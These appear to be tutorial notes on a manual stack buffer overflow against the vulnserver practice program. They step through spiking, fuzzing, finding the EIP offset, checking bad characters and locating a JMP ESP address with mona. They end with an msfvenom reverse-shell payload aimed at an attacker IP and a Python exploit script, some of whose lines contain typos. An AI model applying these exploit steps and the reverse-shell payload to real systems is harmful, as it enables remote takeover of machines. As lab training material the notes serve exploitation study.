Buffer overflow

A buffer overflow occurs when the volume of data exceeds the storage capacity of memory buffer. As a result, the program attempting to write data to the buffer overwrites adjacent memory locations.

Required:

vulnserver grey immunity debugger

Note this is the MANUAL method

// steps to conduct a buffer overflow

1. Spiking (method that we use to find a vulnerable part of the program)
2. Fuzzing (we send bunch of characters to program to see if we break it)
3. Finding the offset
4. Overwriting the EIP
5. Finding bad characters
6. finding the right module
7. Generating the shellcode (malicious shell code to get reverse shell)
8. root!


get vulnserver running (as administrator)
run immunity as admin
file, attach, vulnserver.exe
play button (running)

kali:-# nc -nv ip 9999
HELP
TRUN

# try to break the program (spiking)
generic_send_tcp 192.168.1.90 9999 stats.spk 0 0

stats.spk
s_readline();
s_string(*STATS &);
s_string_variable("0");

trun.spk for vuln TRUN
s_readline();
s_string(*TRUN &);
s_string_variable("0");

generic_send_tcp 192.168.1.90 9999 trun.spk 0 0

overwritten ESP, EIP (control EIP)

// Fuzzing: (very similar to spiking as sending characters)
1.py
#!/usr/bin/python
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
	try:
		s=socket.socket(socket.AF_INET,socket.SOCK_STEAM)
		s.connect(('192.168.1.90',9999))
		s.send(('TRUN /.:/" + buffer))
		s.close()
		sleep(1)
		buffer = buffer + "A"*100
	except:
		print "Fuzzing crashed at %s bytes" % str(len(buffer))
		sys.exit()

// crashed at 2700 bytes
// finding EIP value (finding the offset)
/usr/share/metasploit-framework/tools/pattern_create.rb -l 3000
copy it and modify our script 2.py
paste it in the offset

#!/usr/bin/python
import sys, socket
offset = ""

try:
		s.socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		s.connect((192.168.1.90',9999))
		s.send(('TRUN /.:/' + offset))
		s.close()

except:
		print "Error connecting to server"
		sys.exit()

get immunity and vulserver up again (as admin)
interested in the EIP value

/usr/share/metasploit-framework/tools/pattern_offset.rb -l 3000 -q 386F4337
Exact match at offset ....

//Overwriting EIP
delete offset in 2.py
shellcode= "A" * 2003 + B * 4

replace s.send((TRUN /.:/ + shellcode))

// finding bad characters
badchars = (
  "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

edit 2.py
add
shellcode= "A" * 2003 + B * 4 + badchars
run it

right click on ESP and follow dump (looking at the Hex)

// mona
Finding the right module
mona modules
https://github.com/corelan/mona
download mona.py and place in C:\program files\immunity inc\immunity debugger\PyCommands

type in bar below immunity debugger
!mona modules
locate nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

nasm> JMP ESP 
exit

type in Immunity Debugger
!mona find -s "\xff\xe4" | m essfunc.dll

looking for return address
0x625011af
gedit 2.py
delete the badchars
625011af in reverse (x86 little endian format and will hit a jmp point)
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"
 find the offset by searching for 625011af
hit f2 to mark it as blue (this becomes a breakpoint)
it will break the instruction (pause) and hit play

// shell
//generating shell code & obtaining root!

if we had any bad characters you would put them in -b

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.131 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

grab the information and note the payload size 
gedit 2.py
declare new variable  and add NOPS in shellcode
overflow = { COPIED INFORMATION }
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" +"\x90" * 32 + overflow